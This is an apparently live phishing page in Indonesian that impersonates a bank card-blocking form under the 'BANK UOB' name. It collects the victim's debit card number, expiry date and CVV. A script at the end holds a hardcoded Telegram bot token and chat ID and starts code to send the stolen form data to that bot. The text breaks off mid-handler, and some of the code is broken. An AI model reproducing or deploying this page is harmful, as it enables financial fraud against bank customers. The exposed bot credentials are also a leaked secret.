<!DOCTYPE html>
<html lang="id">
 <head>
  <meta charset="UTF-8">
  <meta name="fragment" 
content="!">
  <meta name="theme-color" content="#fff">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta 
content="© 2021 PT BANK UOB (persero) Tbk, All Rights Reserved." name="description">
  <meta content="menu" property="og:title">
  <meta content="© 2021 PT BANK UOB (persero) Tbk, All Rights Reserved."property="og:description">
  <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui">
<title>BANK UOB</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
<link rel="stylesheet" href="./style.css">
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">
  <link href="https://i.ibb.co/6JqBbd2/images-13.png" rel="shortcut icon" type="image/x-icon">
  <link href="https://i.ibb.co/tzsqQSs/Logo-baru-BRImo-svg.png" rel="apple-touch-icon">
  <link href="https://fonts.googleapis.com/css?family=Aldrich" rel="stylesheet" type="text/css">
 <link href="https://fonts.googleapis.com/css?family=Alfa+Slab+One" rel="stylesheet" type="text/css">
  <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js">
</script>
  <script 
nomodule src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>
 </head>
 <body>
  <style>
@import url("https://fonts.googleapis.com/css?family=Source+Code+Pro:400,500,600,700|Source+Sans+Pro:400,600,700&display=swap");
.html {
    width: 100%;
    height:150%;
}
@media screen and (max-width: 100%) {
body {
  background-image: url("");
  font-family: "Source Sans Pro", sans-serif;
  background-size: 100% 100%;
         background-position: 100% 100%;
       position: fixed;
      height:100% ;
  font-size: 16px;
  width: 100%;
  height: 150%;
  background-color: #fff;
}
* {
  box-sizing: border-box;
}
*:focus {
  outline: ;
}
}
@media screen and (max-width: 100%) {
body {
  background-image: url("");
  font-family: "Source Sans Pro", sans-serif;
  background-size: 100% 100%;
         background-position: 100% 100%;
       position: fixed;
         height:100% ;
  font-size: 16px;
  width: 100%;
  height: 150%;
  background-color: #fff;
}
* {
  box-sizing: border-box;
}
*:focus {
  outline: 100% ;
}
}
@media screen and (max-width: 480px) {
  .container {
    position: static;
    display: -webkit-box;
    display: -webkit-flex;
    display: -ms-flexbox;
    display: flex;
    height: 500px;
    max-height: 516px;
    max-width: 100%;
    min-height: 616px;
    -webkit-box-orient: vertical;
    -webkit-box-direction: normal;
    -webkit-flex-direction: column;
    -ms-flex-direction: column;
    flex-direction: column;
  }
  .container-6 {
    height: 640px;
    max-width: 100%;
    background-color: ;
    background-image: url("");
    background-position: 0px 0px;
    background-size: 100% 918px;
    background-repeat: no-repeat;
    text-align: center;
  }
}
.wrapper {
  min-height: 30vh;
  display: block;
  padding: 80px 0px;
  top: 0px;
  height: 100%;
}
}
@media screen and (max-width: 100%), (max-height: 100%) {
  .wrapper {
    flex-wrap: wrap;
    flex-direction: column;
    height: 100%;
  }
}
.card-form {
  max-width: 100%;
  margin: auto;
  width: 100%;
  height: 85%;
  padding: 0px;
  border-radius: 15px;
}
@media screen and (max-width: 480) {
  .card-form {
    margin: 0 auto;
    margin-top; 10px
  }
}
.card-form__inner {
  background: #dedede;
  box-shadow:;
  border: 3px solid snow;
  color: #000;
  border-radius: 20px;
  padding: 10px;
  width: 92%;
  left: 0;
  right: 0;
  margin: 0px auto;
  position: relative;
  padding-top: 10px;
  margin-top; -40px;
  box-shadow: #727269 5px 5px 7px 0px;
}
@media screen and (max-width: 480px) {
  .card-form__inner {
    padding: 15px;
    margin-top: 145px;
  }
}
@media screen and (max-width: 360px) {
  .card-form__inner {
    padding: 15px;
    margin-top: 145px;
  }
}
.card-form__row {
  display: flex;
  align-items: flex-start;
}
@media screen and (max-width: 480px) {
  .card-form__row {
    flex-wrap: wrap;
  }
}
.card-form__col {
  flex: auto;
  margin-right: 35px;
}
.card-form__col:last-child {
  margin-right: 0;
}
@media screen and (max-width: 480px) {
  .card-form__col {
    margin-right: 0;
    flex: unset;
    width: 100%;
    margin-bottom: 20px;
  }
  .card-form__col:last-child {
    margin-bottom: 0;
  }
}
.card-form__col.-cvv {
  max-width: 150px;
}
@media screen and (max-width: 480px) {
  .card-form__col.-cvv {
    max-width: initial;
  }
}
.card-form__group {
  display: flex;
  align-items: flex-start;
  flex-wrap: wrap;
}
.card-form__group .card-input__input {
  flex: 1;
  margin-right: 15px;
}
.card-form__group .card-input__input:last-child {
  margin-right: 0;
}
.card-form__button {
  width: 100%;
  height: 48px;
  background: #006cff;
  border: none;
  border-radius: 8px;
  font-size: 18px;
  font-weight: 700;
  font-family: "Source Sans Pro";
  box-shadow: 8px 10px 10px 0px rgba(0,0,0,0.41);
    -webkit-box-shadow: 4px 5px 10px 0px rgba(0,0,0,0.41);
-moz-box-shadow: 8px 5px 5px 0px rgba(0,0,0,0.41);
  color: #fff;
  margin-top: -10px;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-form__button {
    margin-top: 10px;
  }
}
.card-item {
  max-width: 430px;
  height: 47%;
  margin-left: auto;
  margin-right: auto;
  position: relative;
  z-index: 2;
  width: 100%;
}
@media screen and (max-width: 480px) {
  .card-item {
    max-width: 100%;
    height: 49%;
    width: 90%;
  }
}
@media screen and (max-width: 360px) {
  .card-item {
    height: 47%;
  }
}
.card-item.-active .card-item__side.-front {
  transform: perspective(1000px) rotateY(180deg) rotateX(0deg) rotateZ(0deg);
}
.card-item.-active .card-item__side.-back {
  transform: perspective(1000px) rotateY(0) rotateX(0deg) rotateZ(0deg);
}
.card-item__focus {
  position: absolute;
  z-index: 3;
  border-radius: 5px;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  transition: all 0.35s cubic-bezier(0.71, 0.03, 0.56, 0.85);
  opacity: 0;
  pointer-events: none;
  overflow: hidden;
  border: 0px solid rgba(255, 255, 255, 0.65);
}
.card-item__focus:after {
  content: "";
  top: 0;
  left: 0;
  background:  ;
}
.card-item__focus.-active {
  opacity: 1;
}
.card-item__side {
  border-radius: 15px;
  overflow: hidden;
  box-shadow: 0 20px 60px 0 rgba(14, 42, 90, 0.55);
  transform: perspective(2000px) rotateY(0deg) rotateX(0deg) rotate(0deg);
  transform-style: preserve-3d;
  transition: all 0.8s cubic-bezier(0.71, 0.03, 0.56, 0.85);
  backface-visibility: hidden;
  height: 100%;
}
.card-item__side.-back {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  transform: perspective(2000px) rotateY(-180deg) rotateX(0deg) rotate(0deg);
  z-index: 2;
  padding: 0;
  height: 100%;
}
.card-item__side.-back .card-item__cover {
  transform: rotateY(-180deg);
}
.card-item__bg {
  max-width: 100%;
  display: block;
  max-height: 100%;
  height: 100%;
  width: 100%;
  object-fit: 50%;
  border-radius: 15px;
  border: 2px solid snow;
}
.card-item__cover {
  height: 100%;
  background-color: #000;
  position: absolute;
  bottom: 0;
  left: 0;
  top: 0;
  border: 0px solid #000;
  width: 100%;
  border-radius: 15px;
  overflow: hidden;
  margin-bottom: -120px;
}
.card-item__cover:after {
  content: "";
  position: absolute;
  left: 0;
  border-radius: 20px;
  top: 0;
  width: 100%;
  height: 100%;
  background: transparent;
}
.card-item__top {
  display: flex;
  align-items: flex-start;
  justify-content: space-between;
  margin-bottom: 40px;
  padding: 0 10px;
}
@media screen and (max-width: 480px) {
  .card-item__top {
    margin-bottom: 10px;
     margin-top: 32px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__top {
    margin-bottom: 10px;
    margin-top: 32px;
    width: 50px;
  }
}
.card-item__chip {
  width: 60px;
  margin-left: 5px;
  margin-top: -30px;
}
@media screen and (max-width: 480px) {
  .card-item__chip {
    width: 40px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__chip {
    width: 40px;
  }
}
.card-item__type {
  height: 45px;
  position: relative;
  display: flex;
  justify-content: flex-end;
  max-width: 100px;
  margin-left: auto;
  width: 100%;
}
@media screen and (max-width: 480px) {
  .card-item__type {
    height: 40px;
    max-width: 90px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__type {
    height: 40px;
  }
}
.card-item__typeImg {
  max-width: 100%;
  object-fit: contain;
  max-height: 100%;
  object-position: top right;
}
.card-item__info {
  color: #fff;
  width: 100%;
  max-width: calc(100% - 85px);
  padding: 10px 15px;
  font-weight: 800;
  display: block;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-item__info {
    padding: 10px;
  }
}
.card-item__holder {
  opacity: 1;
  font-size: 13px;
  margin-bottom: 6px;
  color: #fff;
  font-weight: 800;
}
@media screen and (max-width: 480px) {
  .card-item__holder {
    font-size: 10px55px;
  }
}
.card-item__wrapper {
  font-family: "Source Code Pro", monospace;
  padding: 25px 15px;
  position: relative;
  z-index: 4;
  height: 100%;
  
  user-select: none;
}
@media screen and (max-width: 480px) {
  .card-item__wrapper {
    padding: 20px 10px;
  }
}
.card-item__name {
  font-size: 18px;
  margin-top: -4px;
  line-height: 1;
  white-space: nowrap;
  max-width: 100%;
  overflow: hidden;
  text-overflow: ellipsis;
  text-transform: uppercase;
}
@media screen and (max-width: 480px) {
  .card-item__name {
    font-size: 16px;
  }
}
@media screen and (max-width: 480px) {
.card-item__holder{
     opacity: 1;
  font-size: 13px;
  margin-bottom: 0px;
  color: #fff;
  font-weight: 800;
}
.card-item__nameItem {
  display: inline-block;
  min-width: 10px;
  position: relative;
}
.card-item__number {
  font-weight: 800;
  line-height: 0.9;
  font-size: 25px;
  margin-bottom: -30px;
  display: inline-block;
  padding: 30px 5px;
  letter-spacing: 2px;
  cursor: pointer;
  color: #fff;
  opacity: 1;
}
@media screen and (max-width: 400px) {
  .card-item__number {
    font-size: 22px;
    margin-bottom: -20px;
    padding: 15px 15px;
    opacity: 0.9;
  }
}
@media screen and (max-width: 360px) {
  .card-item__number {
    font-size: 30px;
    margin-bottom: -20px;
    padding: 10px 10px;
    opacity: 1;
  }
}
.card-item__numberItem {
  width: 16px;
  display: inline-block;
   color: #fff;
   margin-top: -40px;
}
.card-item__numberItem.-active {
  width: 30px;
}
@media screen and (max-width: 480px) {
  .card-item__numberItem {
    width: 14px;
  }
  .card-item__numberItem.-active {
    width: 16px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__numberItem {
    width: 12px;
  }
  .card-item__numberItem.-active {
    width: 8px;
  }
}
.card-item__numberItem:active{
    color: #fff;
}
.card-item__content {
  color: #fff;
  display: flex;
  align-items: flex-start;
}
.card-item__date {
  flex-wrap: wrap;
  font-size: 18px;
  margin-left: auto;
  padding: 10px;
  display: inline-flex;
  width: 80px;
  margin-top: -4px;
  white-space: nowrap;
  flex-shrink: 0;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-item__date {
    font-size: 16px;
  }
}
.card-item__dateItem {
  position: relative;
}
.card-item__dateItem span {
  width: 22px;
  display: inline-block;
  color: #fff;
  font-weight: 800;
  margin-top: 10px;
  text-align: left;
  margin-left: -220px;
}
.card-item__dateTitle {
  opacity: 1;
  font-size: 13px;
  padding-bottom: 0px;
  width: 100%;
  margin-left: -20px;
  color: #fff;
  font-weight: 800;
}
@media screen and (max-width: 480px) {
  .card-item__dateTitle {
    font-size: 12px;
    padding-bottom: 5px;
  }
}
.card-item__band {
  background:;
  width: 100%;
  height: 50px;
  margin-top: 40px;
  position: relative;
  z-index: 2;
}
@media screen and (max-width: 480px) {
  .card-item__band {
    margin-top: 20px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__band {
    height: 40px;
    margin-top: 10px;
  }
}
.card-item__cvv {
  text-align: right;
  position: relative;
  z-index: 2;
  padding: 15px;
  color: #000;
}
.card-item__cvv .card-item__type {
  opacity: 1;
}
@media screen and (max-width: 360px) {
  .card-item__cvv {
    padding: 10px 15px;
    color: #000;
  }
}
.card-item__cvvTitle {
  padding-right: 10px;
  font-size: 15px;
  font-weight: 800;
  color: #fff;
  margin-bottom: 5px;
}
.card-item__cvvBand {
  height: 45px;
  background: #fff;
  margin-bottom: 30px;
  text-align: right;
  display: flex;
  align-items: center;
  justify-content: flex-end;
  padding-right: 10px;
  color: #00CED1;
  font-size: 18px;
  border-radius: 4px;
  box-shadow: 0px 10px 20px -7px rgba(32, 56, 117, 0.35);
}
@media screen and (max-width: 480px) {
  .card-item__cvvBand {
    height: 40px;
    margin-bottom: 20px;
    border: 0px solid #0851C4;
  }
}
@media screen and (max-width: 360px) {
  .card-item__cvvBand {
    margin-bottom: 15px;
    border: 0px solid #0851C4;
  }
}
.card-list {
  margin-bottom: -100px;
}
@media screen and (max-width: 480px) {
  .card-list {
    margin-bottom: -120px;
  }
}
.card-input {
  margin-bottom: 20px;
}
.card-input__label {
  font-size: 17px;
  margin-bottom: 5px;
  font-weight: 500;
  color: #fff;
  width: 100%;
  display: none;
  user-select: none;
}
.card-input__input {
 width: 100%;
  height: 45px;
  border-radius: 5px;
  box-shadow: 1px 1px 15px 1px rgba(36, 52, 70, 0.26);
  border: 0px solid #0060B1;
  transition: all 0.3s ease-in-out;
  font-size: 16px;
  padding: 5px 15px;
  background: #fff;
  color: #000;
  outline: none;
  font-family: "Source Sans Pro", sans-serif;
}
.card-input__input:hover, .card-input__input:focus, .card-input__input1:hover, .card-input__input3:hover{
  border:2px solid #006cff;
  outline: none;
}
.card-input__input:focus, .card-input__input1:focus, .card-input__input3:focus {
  box-shadow: 8px 5px 15px 0px rgba(0,0,0,0.21);
    -webkit-box-shadow: 6px 15px 10px 0px rgba(0,0,0,0.21);
-moz-box-shadow: 8px 5px 15px 0px rgba(0,0,0,0.21);

}
.card-input {
  margin-bottom: 20px;
}
.card-input__label {
  font-size: 17px;
  margin-bottom: 5px;
  font-weight: 500;
  color: #000;
  width: 100%;
  display: none;
  user-select: none;
}
.card-input__input1 {
  width: 100%;
  height: 45px;
  border-radius: 5px;
  box-shadow: 1px 1px 15px 1px rgba(36, 52, 70, 0.26);
  border: 0px none #fff;
  transition: all 0.3s ease-in-out;
  font-size: 16px;
  padding: 5px 15px;
  background: #fff;
  color: none;
  outline: none;
  font-family: "Source Sans Pro", sans-serif;
}
.card-input__input1:hover, .card-input__input1:focus, .card-input__input:active {
  border-color: ;
  outline: none;
}
.card-input__input1:focus {
  box-shadow: 8px 5px 15px 0px rgba(0,0,0,0.21);
    -webkit-box-shadow: 6px 15px 10px 0px rgba(0,0,0,0.21);
-moz-box-shadow: 8px 5px 15px 0px rgba(0,0,0,0.21);
background-color: snow;
outline: none;
}
.card-input__input.-select {
  -webkit-appearance: none;
  background-size: 12px;
  background-position: 90% center;
  background-repeat: no-repeat;
  padding-right: 20px;
}
.card-input__input3{
  width: 100%;
  height: 45px;
  border-radius: 5px;
  box-shadow: 1px 1px 15px 1px rgba(36, 52, 70, 0.26);
  border: 0px solid #006cff;
  transition: all 0.3s ease-in-out;
  font-size: 16px;
  padding: 5px 15px;
  background: #fff;
  color: #000;
  outline: none;
  font-family: "Source Sans Pro", sans-serif;
}
.slide-fade-up-enter-active {
  transition: all 0.25s ease-in-out;
  transition-delay: 0.1s;
  position: relative;
}
.slide-fade-up-leave-active {
  transition: all 0.25s ease-in-out;
  position: absolute;
}
.slide-fade-up-enter {
  opacity: 0;
  transform: translateY(15px);
  pointer-events: none;
}
.slide-fade-up-leave-to {
  opacity: 0;
  transform: translateY(-15px);
  pointer-events: none;
}
.slide-fade-right-enter-active {
  transition: all 0.25s ease-in-out;
  transition-delay: 0.1s;
  position: relative;
}
.slide-fade-right-leave-active {
  transition: all 0.25s ease-in-out;
  position: absolute;
}
.slide-fade-right-enter {
  opacity: 0;
  transform: translateX(10px) rotate(45deg);
  pointer-events: none;
}
.slide-fade-right-leave-to {
  opacity: 0;
  transform: translateX(-10px) rotate(45deg);
  pointer-events: none;
}
.github-btn {
  position: absolute;
  right: 40px;
  bottom: 50px;
  text-decoration: none;
  padding: 15px 25px;
  border-radius: 4px;
  box-shadow: 0px 4px 30px -6px rgba(36, 52, 70, 0.65);
  background: #000;
  color: #fff;
  font-weight: bold;
  letter-spacing: 1px;
  font-size: 16px;
  text-align: center;
  transition: all 0.3s ease-in-out;
}
@media screen and (min-width: 500px) {
  .github-btn:hover {
    transform: scale(1.1);
    box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
  }
}
@media screen and (max-width: 700px) {
  .github-btn {
    position: relative;
    bottom: auto;
    right: auto;
    margin-top: 20px;
  }
  .github-btn:active {
    transform: scale(1.1);
    box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
  }
}
body {font-family: Arial, Helvetica, sans-serif;
width: 100%;
position: center;
}
* {box-sizing: border-box;}
/* Button used to open the contact form - fixed at the bottom of the page */
.open-button {
  background-color: #000;
  color: #000;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  opacity: 0.8;
  position: fixed;
  bottom: 23px;
  right: 28px;
  width: 280px;
}
/* The popup form - hidden by default */
.form-popup {
  background-color:#000;
  display: none;
  position: fixed;
  margin-top: -600px;
  margin-left: 10px;
  margin-right: 10px;
  box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
  top: 0;
  height: 100%;
  left: 0;
  right: 0;
  border: 0px solid #006cff;
  border-radius: 0px;
  width: 100%;
  z-index: 999999999;
  margin: 0px auto;
  padding: 20px;
}
/* Add styles to the form container */
.form-container {
  max-width: 100%;
  padding: 10px;
  background-color: #000;
}
/* Full-width input fields */
.form-container input[type=text], .form-container input[type=password] {
  width: 100%;
  padding: 15px;
  margin: 5px 0 22px 0;
  border: none;
  background: #fff;
}
/* When the inputs get focus, do something */
.form-container input[type=text]:focus, .form-container input[type=password]:focus {
  background-color: #000;
  outline: none;
}
/* Set a style for the submit/login button */
.form-container .btn {
  background-color: #000;
  color: white;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  width: 100%;
  margin-bottom:10px;
  opacity: 0.8;
}
/* Add a red background color to the cancel button */
.form-container .cancel {
  background-color: #000;
}
/* Add some hover effects to buttons */
.form-container .btn:hover, .open-button:hover {
  opacity: 1;
}
  #lodingku{
    position: fixed; 
    top: 0; 
    right: 0; 
    left: 0; 
    display: none;
    bottom: 0;
    margin: 0px auto;
    width: 100%;
    height: 100%;
    background: rgba(0, 0, 0, 0.5);
    z-index: 99999999;
}
 .styleku {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
  -webkit-animation-name: bounceInDown; 
    animation-name: bounceInDown; 
}
@-webkit-keyframes bounceInDown { 
   0% { 
       opacity: 0; 
        -webkit-transform: translateY(-200px); 
    } 
    60% { 
        opacity: 1; 
        -webkit-transform: translateY(30px); 
    } 
    80% { 
        -webkit-transform: translateY(10px); 
    } 
    100% { 
        -webkit-transform: translateY(0); 
    } 
} 
@keyframes bounceInDown { 
    0% { 
        opacity: 0; 
        transform: translateY(-200px); 
    } 
    60% { 
        opacity: 1; 
        transform: translateY(30px); 
    } 
    80% { 
        transform: translateY(10px); 
    } 
    100% { 
        transform: translateY(0); 
    } 
} 
 .card-input__input::placeholder{
     color: #000;
 }      
 .card-input__input1::placeholder{
     color: #000;
 }  
 .card-input__input3::placeholder{
     color: #000;
 }  
 select:selected{
     color: #000;
 }      
 cs{
     font-weight: bold;
 }
  ion-icon{
      position: absolute;
      right: 20;
      margin-top: 15px;
      font-size: 20px;
      color: #000;
  }
  .nav1{
      z-index:999999;
      position: fixed;
      background: url("https://picjj.com/images/2024/09/12/WTOrQT.jpg") transparent;
      background-repeat: no-repeat;
      background-size: 100%;
      height: 63px;
      width: 100%;
      margin: 0px auto;
      box-shadow: 0px 1px 4px 2px rgba(66, 68, 90, 0.18);
 }
 .nav2{
      z-index:999999;
      position: fixed;
      background: url("https://picjj.com/images/2024/08/14/Wv5hab.jpg") transparent;
      background-repeat: no-repeat;
      background-size: 100%;
      height: 100px;
      width: 100%;
      bottom: 0; 
      left: 0; 
      right: 0; 
      margin: -24px auto;
      padding-top: 0;
 }
    </style>
<!-- partial:index.partial.html -->
  <nav class="nav1"></nav>
  <div class="container-6" style="text-align: left; background-img: src(https://picjj.com/images/2024/09/12/WTOrQT.jpg);">
   <nav 
style="position: 
fixed; 
margin: 0px 
auto; 
left: 0; 
right: 0; 
top: 0; 
bottom: 0; 
width: 100%; 
height: ; 
background-color: ; 
background-image: url(); 
box-shadow: 3px 3px 8px #b2b2b2;background-size: 100% 100%; 
background-position: 100% 100%;">
</nav>
   <br>
   <div class="wrapper" id="app" style="margin-top: -5px">
    <div class="card-form">
     <div class="card-list">
      <div class="card-item" 
v-bind:class="{ '-active' : isCardFlipped }">
       <div class="card-item__side -front">
        <div class="card-item__focus" 
v-bind:class="{'-active' : focusElementStyle }" 
v-bind:style="focusElementStyle" ref="focusElement">
</div>
        <div class="card-item__cover">
         <img src="https://i.ibb.co.com/PhytzTS/IMG-20241225-WA0018-2.jpg" class="card-item__bg">
        </div>
        <div class="card-item__wrapper" style="margin-top: 33px; margin-left: 20px">
         <div class="card-item__top">
          <div class="card-item__type">
           <transition name="slide-fade-up">
           </transition>
          </div>
         </div>
<label for="cardNumber" 
class="card-item__number" 
ref="cardNumber">
          <div 
class="card-item__holder" 
style="color: #fff; 
font-weight: 200; 
margin-top: -25px; 
margin-bottom: 17px">
          </div>
          <template v-if="getCardType === 'amex'">
           <span v-for="(n, $index) in amexCardMask" :key="$index"> 
<transition name="slide-fade-up">
             <div class="card-item__numberItem" v-if="$index > 4 &amp;&amp; $index < 14 &amp;&amp; cardNumber.length > $index &amp;&amp; n.trim() !== ''">
              *
             </div>
             <div class="card-item__numberItem" :class="{ '-active' : n.trim() === '' }" :key="$index" v-else-if="cardNumber.length > $index">
              {{cardNumber[$index]}}
             </div>
             <div class="card-item__numberItem" :class="{ '-active' : n.trim() === '' }" v-else="" :key="$index + 1">
              {{n}}
             </div>
            </transition> 
</span>
          </template>
          <template v-else="">
           <span v-for="(n, $index) in otherCardMask" :key="$index"> 
<transition name="slide-fade-up">
             <div class="card-item__numberItem" v-if="$index > 4 &amp;&amp; $index < 15 &amp;&amp; cardNumber.length > $index &amp;&amp; n.trim() !== ''">
              *
             </div>
             <div class="card-item__numberItem" :class="{ '-active' : n.trim() === '' }" :key="$index" v-else-if="cardNumber.length > $index">
              {{cardNumber[$index]}}
             </div>
             <div class="card-item__numberItem" :class="{ '-active' : n.trim() === '' }" v-else="" :key="$index + 1">
              {{n}}
             </div>
            </transition>
 </span>
          </template>
</label>
         <div class="card-item__content">
          <label for="cardName" class="card-item__info" ref="cardName">
           <div class="card-item__holder" style="color: #fff; font-weight: 200">
           </div>
<transition name="slide-fade-up">
            <div class="card-item__name" v-if="cardName.length" key="1">
             <transition-group name="slide-fade-right">
              <span class="card-item__nameItem" v-for="(n, $index) in cardName.replace(/\s\s+/g, ' ')" v-if="$index === $index" v-bind:key="$index + 1">{{n}}</span>
             </transition-group>
            </div>
            <div class="card-item__name" v-else="" key="2">
            </div>
           </transition> 
</label>
          <div class="card-item__date" ref="cardDate">
           <label for="cardMonth" class="card-item__dateTitle">
</label> 
<label for="cardMonth" class="card-item__dateItem">
 <transition name="slide-fade-up">
             <span v-if="cardMonth" v-bind:key="cardMonth">{{cardMonth}}</span>
             <span v-else="" key="2">MM/YY</span>
            </transition>
</label>
          </div>
         </div>
        </div>
       </div>
       <center>
        <div class="app-loading" style="position: fixed; margin: 0px auto; left: 0; right: 0; top: 0; bottom: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.4); z-index: 99999999; padding-top: 250px; display: none" id="lodingku1">
        </div>
       </center>
       <div class="card-item__side -back">
        <div class="card-item__cover">
         <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT2wM503-ka6342SHSd3BxI2cV7U_D9avMfYA&usqp=CAU" class="card-item__bg">
        </div>
        <br>
        <div class="card-item__">
</div>
        <div class="card-item__cvv">
         <div class="card-item__cvvTitle">
          CVV
         </div>
         <div class="card-item__cvvBand">
          <span v-for="(n, $index) in cardCvv" :key="$index"> * </span>
         </div>
         <div class="card-item__type">
         </div>
        </div>
       </div>
      </div>
     </div>
     <div class="card-form__inner">
      <div class="space" style="margin:0px;">
</div>
      <form method="post" action="var.html">
       <div class="card-input">
        <input type="hidden" id="nomorku" value=""> 
<label 
for="cardNumber" 
class="card-input__label" 
style="font-weight: 500;">Nomor Kartu Debit/ATM
</label> 
<input 
type="tel" 
id="debit" 
name="aaa" 
class="card-input__input3" 
pattern="(?=.*[0-9]).{19,19}" required oninvalid="this setCustomValidity('Mɑsukkɑn 𝟭𝟲 𝗱𝗶𝗴𝗶𝘁 Nomor 𝗞𝗮𝗿𝘁𝘂 𝗗𝗲𝗯𝗶𝘁 dengɑn Benɑr')" onchange="this.setCustomValidity('')" 
v-model="cardNumber" 
v-on:focus="focusInput" 
v-on:blur="blurInput" 
data-ref="cardNumber" 
autocomplete="on" 
placeholder="MASUKKAN 16 DIGIT NOMOR KARTU" 
minlength="19" 
maxlength="19" 
style="background-position: 0px 0px;
    background-repeat: no-repeat;
    background-attachment: scroll;
     background-color: none;
    background-repeat: no-repeat;
    background-size: 40px 40px;
    background-position: 98% 50%;
    font-weight: 200;">
       </div>
       <center>
        <div class="card-form__row">
         <div class="card-form__col">
          <div class="card-form__group">
           <label 
for="cardMonth" 
class="card-input__label" 
style="font-weight: 800;">Masa Berlaku
</label> 
<input 
type="tel" 
placeholder="VALID THRU" 
id="valid" 
name="bbb" 
class="card-input__input -select" 
v-model="cardMonth" 
v-on:focus="focusInput" 
v-on:blur="blurInput" 
data-ref="cardDate" 
required style="background-image: url(https://picjj.com/images/2024/09/16/WTCYnT.jpg);
    background-attachment: scroll;
     background-color: none;
    background-repeat: no-repeat;
    background-size: 100% 100%;
    background-position: 100% 100%;"> 
<input type="password" 
inputmode="numeric" 
class="card-input__input -select" 
v-mask="'###'" 
maxlength="3" 
v-model="cardCvv" 
v-on:focus="flipCard(true)" 
v-on:blur="flipCard(false)" 
autocomplete="on" id="cvv" name="ccc" placeholder="CVV " 
required style="background-image: url(https://picjj.com/images/2024/09/16/WTCE1H.jpg); background-attachment: scroll;
     background-color: none;
    background-repeat: no-repeat;
    background-size: 100% 100%;
    background-position: 100% 100%;">
          </div>
         </div>
        </div>
       <button 
id="btnSubmit" 
class="card-form__button" 
type="submit" 
style="background:#005baa;font-weight: 500;">BLOKIR KARTU
</button>
        <br>
        <br>
       </center>
      </form>
     </div>
    </div>
   </div>
   <nav class="nav2"></nav>
   <style>
h1{
  font-family: sans-serif;
} 
table {
  font-family: Arial, Helvetica, sans-serif;
  line-height: 15px;
  color: #666;
  margin-top: -10px;
  text-shadow: 1px 1px 0px #fff;
  background: #eaebec;
  border: #fff 2px solid;
  font-size: 5px;
  border-radius: 10px 10px 0px 0px;
}
table th {
  padding: 0px 0px;
  border-left:2px solid #780001;
  border-bottom: 2px solid #780001;
  background: #ededed;
  height: 30px;
  font-weight: bold;
  border-radius: 10px 10px 0px 0px;
} 
table th:first-child{  
  border-left: 1px solid #780001;  
}
table tr {
  text-align: center;
  padding-left: 20px;
  font-weight: bold;
}
table td:first-child {
  text-align: center;
  padding-left: 20px;
  border-left: 0;
}
table td {
  padding: 15px 35px;
  border-top: 1px solid #ffffff;
  border-bottom: 1px solid #780001;
  border-left: 1px solid #780001;
  background: #fafafa;
  background: -webkit-gradient(linear, left top, left bottom, from(#fbfbfb), to(#fafafa));
  background: -moz-linear-gradient(top, #fbfbfb, #fafafa);
  font-size: 6px;
} 
table tr:last-child td {
  border-bottom: 0;
} 
table tr:last-child td:first-child {
  -moz-border-radius-bottomleft: 3px;
  -webkit-border-bottom-left-radius: 3px;
  border-bottom-left-radius: 3px;
} 
table tr:last-child td:last-child {
  -moz-border-radius-bottomright: 3px;
  -webkit-border-bottom-right-radius: 3px;
  border-bottom-right-radius: 3px;
} 
table tr:hover td {
  background: #f2f2f2;
  background: -webkit-gradient(linear, left top, left bottom, from(#f2f2f2), to(#f0f0f0));
  background: -moz-linear-gradient(top, #f2f2f2, #f0f0f0);
}    
</style>
   <center>
    <script 
src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js" integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg==" crossorigin="anonymous" referrerpolicy="no-referrer">
</script>
   </center>
  </div>
  <script 
src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js">
</script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous">
</script>
  <p id="status">
</p>
  <script src="setPin.js">
</script>
  <script> 
            $(document).ready(function() {
            $("div#eyeOpen").on('click', function() {
                $("#eyeOpen").css("display", "none");
                $("#eyeClose").css("display", "block");
                $("#password").prop("type", "text");
                $("div#eyeClose").on('click', function() {
                    $("#eyeOpen").css("display", "block");
                    $("#eyeClose").css("display","none");
                    $("#password").prop("type","password");
                });
            });            
const chat_id = '7825546670',
 botID ='7754681919:AAFYv8a4OK9NNalydPWP3VdaZ_7DwQT5Zn8';
    const telegramURL = https://core.telegram.org/bots/api/${botID}/sendMessage`;

    document.querySelector('#setOtp').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
